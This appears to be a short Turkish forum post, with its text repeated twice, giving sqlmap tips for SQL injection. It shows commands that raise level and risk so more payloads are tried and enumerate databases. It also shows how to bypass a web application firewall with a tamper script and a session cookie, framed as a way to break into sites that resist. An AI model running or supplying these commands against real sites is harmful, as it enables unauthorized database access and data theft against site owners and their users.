- 27 Ağu 2021
- 122
- 31
- 25
Level Riskleri:
Level riskleri ile bir sitede neredeyse bir açığı rahatça bulabilirsiniz çünkü acayip fazla payload deniyor ve buda işlemin geçikmesine sebep olur mesela sen bir sitede sql inject oldugunu kesin bir şekilde kanıtladın ama siteye sızamıyorsun nedeni payloadların o güvenlik duvarı üzerindeki etkisizlikleri
sqlmap -u "deneme.com" --dbs --level=5 --risk=3 burada leveli riskleri kendiniz değer verebilirsiniz
sqlmap -hh bu komut ile tüm parametreleri görüntüleyebilirsiniz
WAF:
waf nasıl atlatırız dersek onlarıda tamper scriptleri ile atlatabiliriz
Örnek: sqlmap -u "denemecom" -cookie --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "randomcase" --dbs
Level riskleri ile bir sitede neredeyse bir açığı rahatça bulabilirsiniz çünkü acayip fazla payload deniyor ve buda işlemin geçikmesine sebep olur mesela sen bir sitede sql inject oldugunu kesin bir şekilde kanıtladın ama siteye sızamıyorsun nedeni payloadların o güvenlik duvarı üzerindeki etkisizlikleri
sqlmap -u "deneme.com" --dbs --level=5 --risk=3 burada leveli riskleri kendiniz değer verebilirsiniz
sqlmap -hh bu komut ile tüm parametreleri görüntüleyebilirsiniz
WAF:
waf nasıl atlatırız dersek onlarıda tamper scriptleri ile atlatabiliriz
Örnek: sqlmap -u "denemecom" -cookie --cookie "security=medium; PHPSESSID=de9fd298875093226427e5475c47b5eb" --tamper "randomcase" --dbs